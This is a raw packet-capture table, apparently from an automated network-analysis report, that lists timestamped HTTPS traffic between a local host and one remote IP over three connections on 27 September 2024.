Sep 27, 2024 00:28:46.353878021 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.354001999 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.354007006 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.354053974 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.368033886 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.368055105 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.368206024 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.368210077 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.368289948 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.384460926 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.384485960 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.384591103 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.384594917 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.384645939 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.397546053 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.397571087 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.397640944 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.397645950 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.397732973 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.412547112 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.412568092 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.412653923 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.412657976 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.412730932 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.424758911 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.424782991 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.424943924 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.424947977 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.425107002 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.433471918 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.433494091 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.433568954 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.433574915 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.433669090 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.443244934 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.443264961 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.443490028 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.443504095 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.443589926 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.452255964 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.452274084 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.452385902 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.452393055 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.452532053 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.459525108 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.459541082 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.459650993 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.459656954 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.459992886 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.470299006 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.470319986 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.470395088 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.470400095 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.470834017 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.483818054 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.483836889 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.485038996 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.485045910 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.485389948 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.496212959 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.496233940 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.496304035 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.496308088 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.496465921 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.509746075 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.509762049 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.509882927 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.509888887 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.511426926 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.519073009 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.519088030 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.519184113 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.519187927 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.521187067 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.530131102 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.530150890 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.530247927 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.530251980 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.533188105 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.537998915 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.538016081 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.538096905 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.538103104 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.541188002 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.545291901 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.545308113 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.545372963 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.545389891 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.545557022 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.558938980 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.558954000 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.559021950 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.559031010 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.559134007 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.572197914 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.572216988 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.572295904 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.572303057 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.572402954 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.584917068 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.584933996 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.585261106 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.585268021 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.585304022 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.598829031 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.598845959 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.598929882 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.598936081 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.598982096 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.607621908 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.607637882 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.607707024 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.607712030 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.607810974 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.617376089 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.617392063 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.617482901 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.617487907 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.617640972 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.626810074 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.626827955 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.626965046 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.626971960 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.627013922 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.633759975 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.633779049 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.634143114 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.634152889 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.637192011 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.647627115 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.647653103 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.647761106 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.647761106 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.647768021 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.647922993 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.661598921 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.661621094 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.661854982 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.661861897 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.662053108 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.674140930 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.674164057 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.674254894 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.674266100 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.674825907 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.680635929 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.680708885 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.680721045 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.680775881 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.681314945 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.681340933 CEST	443	57888	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.681425095 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.681425095 CEST	57888	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.682593107 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.682640076 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:46.682849884 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.683100939 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:46.683116913 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:47.649296999 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:47.649559021 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:47.650024891 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:47.650034904 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:47.652236938 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:47.652245998 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.123918056 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.123945951 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.123960972 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.124222994 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.124243975 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.124316931 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.153951883 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.153980017 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.154217005 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.154231071 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.154288054 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.222033024 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.222059965 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.222234011 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.222254992 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.222306967 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.247869015 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.247899055 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.248002052 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.248016119 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.248066902 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.281126022 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.281152010 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.281357050 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.281373978 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.281433105 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.312107086 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.312131882 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.312429905 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.312443972 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.312500000 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.335366011 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.335402012 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.335607052 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.335618019 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.335664034 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.352708101 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.352735043 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.352821112 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.352830887 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.352874994 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.373591900 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.373619080 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.373730898 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.373742104 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.373789072 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.383440971 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.383461952 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.383589029 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.383599997 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.383646011 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.399363041 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.399388075 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.399435997 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.399456978 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.399473906 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.399497032 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.411904097 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.411921024 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.412035942 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.412048101 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.412096977 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.426295042 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.426316023 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.426594973 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.426608086 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.426682949 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.439213037 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.439240932 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.439316988 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.439337969 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.439379930 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.448199987 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.448216915 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.448288918 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.448301077 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.448348999 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.457943916 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.457959890 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.458035946 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.458045959 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.458090067 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.467106104 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.467123985 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.467231989 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.467243910 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.467293024 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.474653006 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.474668980 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.474771023 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.474781990 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.474829912 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.483293056 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.483310938 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.483400106 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.483427048 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.483640909 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.493900061 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.493925095 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.493990898 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.494003057 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.494062901 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.505896091 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.505920887 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.506006002 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.506019115 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.506066084 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.521822929 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.521862030 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.521924019 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.521939039 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.521960974 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.521995068 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.533185005 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.533202887 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.533257008 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.533274889 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.533292055 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.533313036 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.540328026 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.540344000 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.540407896 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.540420055 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.540435076 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.540466070 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.549601078 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.549617052 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.549673080 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.549683094 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.549699068 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.549725056 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.557245970 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.557261944 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.557323933 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.557333946 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.557517052 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.565913916 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.565931082 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.566005945 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.566015959 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.566061974 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.570499897 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.570580006 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.570583105 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.570633888 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.570836067 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.570854902 CEST	443	57890	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.570875883 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.570904970 CEST	57890	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.571932077 CEST	57891	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.571971893 CEST	443	57891	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:48.572042942 CEST	57891	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.572267056 CEST	57891	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:48.572283030 CEST	443	57891	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:49.228288889 CEST	443	57891	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:49.228374958 CEST	57891	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:49.229027033 CEST	57891	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:49.229032993 CEST	443	57891	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:49.231167078 CEST	57891	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:49.231172085 CEST	443	57891	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:49.679974079 CEST	443	57891	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:49.679991007 CEST	443	57891	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:49.680011988 CEST	443	57891	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:49.680041075 CEST	57891	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:49.680059910 CEST	57891	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:49.680069923 CEST	443	57891	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:49.680099964 CEST	57891	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:49.680149078 CEST	57891	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:49.713557005 CEST	443	57891	5.75.211.162	192.168.2.6
